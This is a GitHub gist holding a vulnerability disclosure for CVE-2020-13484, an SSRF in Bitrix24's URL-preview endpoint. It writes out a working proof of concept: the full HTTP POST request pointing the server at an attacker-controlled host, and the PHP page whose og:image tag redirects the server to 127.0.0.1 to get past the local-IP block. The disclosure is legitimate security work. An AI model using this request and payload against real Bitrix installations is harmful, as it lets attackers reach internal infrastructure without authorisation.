Last active
October 9, 2023 19:09
-
-
Save mariuszpoplwski/f261a4bc06adde5c78760559db9d63bd to your computer and use it in GitHub Desktop.
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
CVE-2020-13484 | |
https://gist.github.com/mariuszpoplawski/26e1fbde8f9a607478bee1de90daa329 | |
------------------------------------------ | |
Bitrix24 through 20.0.975 allows SSRF via an intranet IP address in | |
the services/main/ajax.php?action=attachUrlPreview url parameter, if | |
the destination URL hosts an HTML document | |
containing '<meta name="og:image" content="' followed by an intranet URL. | |
------------------------------------------ | |
[Additional Information] | |
Vulnerability allow us to trigger server-side request forgery to remote | |
addresses and second vulnerability in this functionality allowed us to | |
bypass restrictions and generate other request that bypassed policy of | |
local IP block. We were able to generate requests in internal | |
infrastructure. | |
In first stage we have found SSRF that allowed us only send remote | |
requests. Then we manipulated the parser to parse our HTML page and | |
generate second request to internal bitrix core at server side. Bitrix | |
was prsing og:image tags, this way we could triggeer second SSRF. The | |
second request was not properly checked for "local" IP's. | |
To generate SSRF we need to trigger following request: | |
POST /bitrix/services/main/ajax.php?action=attachUrlPreview&show_actions=y&buildd_preview=y&die_step=3&admin_section=Y&show_cache_stat1=Y&clear_cache=Y&c=bitrix:main.urlpreview&mode=ajax&=&sessid=bd277e27ef185f42bebbb1d538e66574&signedParamsString=1.12&listSubscribeId[]=1&itemId=1&deleteSubscribe=Y&userFieldId=0&elementId=1 HTTP/1.1 | |
Host: 192.168.1.24 | |
Origin: http://192.168.1.24 | |
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.163 Safari/537.36 | |
Bx-ajax: true | |
Accept: */* | |
Referer: http://192.168.1.24/stream/ | |
Accept-Encoding: gzip, deflate | |
Accept-Language: pl-PL,pl;q=0.9,en-US;q=0.8,en;q=0.7 | |
Cookie: BITRIX_SM_TIME_ZONE=-120; BITRIX_SM_SALE_UID=0; BITRIX_SM_SOUND_LOGIN_PLAYED=Y; PHPSESSID=btu7cck1irm51hsgs45akh5dma; BITRIX_SM_NCC=Y; BITRIX_SM_LOGIN=admin; BITRIX_SM_LAST_SETTINGS=;show_cache_stat=Y | |
Connection: close | |
Content-Type: application/x-www-form-urlencoded | |
Content-Length: 22 | |
url=http://OurVPSHost/index.php?id=1 | |
"OurVPSHost" host index.php file: | |
--------------------------------- | |
<?php header('Content-Type:text/html'); ?> | |
<meta name="og:image" content="http://127.0.0.1/fake_img.php"/ | |
--------------------------------- | |
Vulnerability send second SSRF, first one do not allow send internal | |
request but the HTML parser parse our og:image tag and send internal | |
request by redirecting bitrix server to 127.0.0.1/fake_img.php. This | |
way we are able to bypass the restrictions of bitrix core. | |
------------------------------------------ | |
[VulnerabilityType Other] | |
Unauthorized server side request forgery, bypass domain whitelist | |
------------------------------------------ | |
[Vendor of Product] | |
1c-bitrix.ru, bitrix24.net | |
------------------------------------------ | |
[Affected Product Code Base] | |
Bitrix and Bitrix Cloud instances affected - up to security update (main 20.0.975), reported and fixed in latest patch | |
------------------------------------------ | |
[Affected Component] | |
Main core URLPreview function | |
------------------------------------------ | |
[Attack Type] | |
Remote | |
------------------------------------------ | |
[CVE Impact Other] | |
Force server side request forgery | |
------------------------------------------ | |
[Attack Vectors] | |
To exploit vulnerability attacker need access to the website, valid | |
unauth session and CSRF token - all can be generated w/o any | |
privileges, no additional requirements needed. | |
------------------------------------------ | |
[Has vendor confirmed or acknowledged the vulnerability?] | |
true | |
------------------------------------------ | |
[Discoverer] | |
Mariusz Poplawski (afine.pl) | |
------------------------------------------ | |
[Reference] | |
https://www.bitrix24.com/prices/self-hosted.php | |
https://www.bitrix24.com/security/ | |
Mariusz Popłwski / AFINE.com team |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment